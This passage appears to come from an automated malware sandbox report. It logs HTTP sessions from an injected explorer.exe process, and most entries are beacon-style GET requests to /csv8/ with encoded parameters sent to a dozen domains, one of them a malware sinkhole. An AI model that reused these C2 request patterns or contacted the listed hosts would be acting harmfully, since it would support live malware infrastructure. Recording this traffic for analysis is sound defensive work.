Jan 13, 2021 21:05:50.268323898 CET	10003	IN	Data Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77 Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
Jan 13, 2021 21:05:50.268348932 CET	10004	IN	Data Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79 Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
Jan 13, 2021 21:05:50.268371105 CET	10006	IN	Data Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53 Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
Jan 13, 2021 21:05:50.268393040 CET	10007	IN	Data Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73 Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
Jan 13, 2021 21:05:50.395473003 CET	10008	IN	Data Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37 Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49769	173.234.175.134	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:06:02.573239088 CET	10013	OUT	GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1 Host: www.travelnetafrica.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:06:02.767956018 CET	10015	IN	HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST Date: Wed, 13 Jan 2021 20:06:01 GMT Connection: close Content-Length: 4298 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e5 80 bc e4 b8 8d e8 83 bd e4 b8 ba 20 6e 75 6c 6c e3 80 82 3c 62 72 3e e5 8f 82 e6 95 b0 e5 90 8d 3a 20 69 6e 70 75 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 31 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 74 3b 63 6f 6c 6f 72 3a 72 65 64 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 32 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 74 3b 63 6f 6c 6f 72 3a 6d 61 72 6f 6f 6e 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 43 6f 6e 73 6f 6c 61 73 22 2c 22 4c 75 63 69 64 61 20 43 6f 6e 73 6f 6c 65 22 2c 4d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 70 74 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 72 6b 65 72 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 78 70 61 6e 64 61 62 6c 65 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 6e 61 76 79 3b 20 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 20 7d 0d Data Ascii: <!DOCTYPE html><html> <head> <title> null<br>: input</title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:pointer; }
Jan 13, 2021 21:06:02.767982006 CET	10016	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 33 39 70 78 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 20 77 69 64 74 68 3a 20 34 34 30 70 78 3b 20 6f 76 Data Ascii: @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width: 280px; }
Jan 13, 2021 21:06:02.767997026 CET	10017	IN	Data Raw: 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 3e e5 a0 86 e6 a0 88 e8 b7 9f e8 b8 aa 3a 3c 2f 62 3e 20 Data Ascii: tr> </table> <br> <b>:</b> <br><br> <table width=100% bgcolor="#ffffcc"> <tr> <td> <code><pre>[ArgumentNullExce
Jan 13, 2021 21:06:02.768013000 CET	10018	IN	Data Raw: 67 65 6e 74 29 0d 0a 20 20 20 e5 9c a8 20 41 6e 74 49 6d 61 67 65 47 72 6f 75 70 2e 41 73 70 4e 65 74 2e 52 65 71 75 65 73 74 49 6e 74 65 72 63 65 70 74 4d 6f 64 75 6c 65 2e 43 6f 6e 74 65 78 74 5f 42 65 67 69 6e 52 65 71 75 65 73 74 28 4f 62 6a Data Ascii: gent) AntImageGroup.AspNet.RequestInterceptModule.Context_BeginRequest(Object sender, EventArgs e) System.Web.HttpApplication.SyncEventExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() System.Web.HttpApp

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49771	45.77.226.209	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:06:18.190871000 CET	10020	OUT	GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1 Host: www.fessusesefsee.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:06:18.245893002 CET	10021	IN	HTTP/1.1 404 Not Found Date: Wed, 13 Jan 2021 20:17:53 GMT Server: X-SinkHole: Malware DNS SinkHole Server Content-Length: 307 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49772	142.44.212.169	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:06:23.388031960 CET	10021	OUT	GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1 Host: www.queensboutique1000.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:06:24.072344065 CET	10023	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 13 Jan 2021 20:06:23 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Set-Cookie: wp_woocommerce_session_f594b69e16a4b5047a231fa253aa1f27=03992809e1dafa22878fd09f51a014ee%7C%7C1610741183%7C%7C1610737583%7C%7C40941839f9c3c2b52346de3c823ded95; expires=Fri, 15-Jan-2021 20:06:23 GMT; Max-Age=172800; path=/; HttpOnly Location: http://queensboutique1000.com/csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49756	142.44.212.169	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:04:54.974946022 CET	9649	OUT	GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1 Host: www.queensboutique1000.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:04:55.720679045 CET	9649	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 13 Jan 2021 20:04:55 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Set-Cookie: wp_woocommerce_session_f594b69e16a4b5047a231fa253aa1f27=b7bae79cc80ddaa5594beaf6bd33068b%7C%7C1610741095%7C%7C1610737495%7C%7Cc55af832d2d4108ede2bccf91945ac5e; expires=Fri, 15-Jan-2021 20:04:55 GMT; Max-Age=172800; path=/; HttpOnly Location: http://queensboutique1000.com/csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49758	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:05:00.634299994 CET	9662	OUT	GET /csv8/?t8o8sPp=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&jBZd=KnhT HTTP/1.1 Host: www.studentdividers.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:05:00.772897959 CET	9665	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Jan 2021 20:05:00 GMT Content-Type: text/html Content-Length: 275 ETag: "5ffc83a2-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49759	192.0.78.208	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:05:05.893126011 CET	9679	OUT	GET /csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT HTTP/1.1 Host: www.logansshop.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:05:05.933063984 CET	9679	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 13 Jan 2021 20:05:05 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://logansshop.net/csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT X-ac: 2.hhn Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49760	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:05:11.046991110 CET	9682	OUT	GET /csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT HTTP/1.1 Host: www.epicmassiveconcepts.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:05:11.186150074 CET	9682	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Jan 2021 20:05:11 GMT Content-Type: text/html Content-Length: 275 ETag: "5ffc8399-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49761	192.155.166.181	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:05:22.236080885 CET	9684	OUT	GET /csv8/?t8o8sPp=/WWabBMDJNFcoLaqfnEbo6hmuOxaPIPf4Swj3PCSZ12YB4sttwIxqUCSSH4NA1N37R36&jBZd=KnhT HTTP/1.1 Host: www.exit-divorce.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:05:22.461457014 CET	9684	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 13 Jan 2021 20:05:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49765	205.134.254.189	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:05:27.905106068 CET	9818	OUT	GET /csv8/?t8o8sPp=UyqXkzQbKyztPGX66qxwvXap1LDI1TOmYI1OusxlxwN3fVBnLta3wXT2zIL/xRkQBU5V&jBZd=KnhT HTTP/1.1 Host: www.splendidhotelspa.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:05:28.102826118 CET	9819	IN	HTTP/1.1 404 Not Found Server: nginx/1.19.3 Date: Wed, 13 Jan 2021 20:05:28 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 236 Connection: close Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 61 79 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 6f 72 20 72 65 2d 6e 61 6d 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 77 65 62 20 73 69 74 65 20 6f 77 6e 65 72 20 66 6f 72 20 66 75 72 74 68 65 72 20 61 73 73 69 73 74 61 6e 63 65 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Error 404 - Not Found</title><head><body><h1>Error 404 - Not Found</h1><p>The document you are looking for may have been removed or re-named. Please contact the web site owner for further assistance.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49766	146.148.193.212	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:05:38.638372898 CET	9992	OUT	GET /csv8/?t8o8sPp=jG588BPFN24GA+JnJbzwJpIoc208xnuoJDpFE+MGYeEjWt0JePkAwfwipDNVrrzBFNJV&jBZd=KnhT HTTP/1.1 Host: www.stnanguo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:05:38.823584080 CET	9993	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 13 Jan 2021 20:05:38 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49767	23.105.124.225	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:05:44.419821978 CET	9994	OUT	GET /csv8/?t8o8sPp=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&jBZd=KnhT HTTP/1.1 Host: www.alparmuhendislik.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

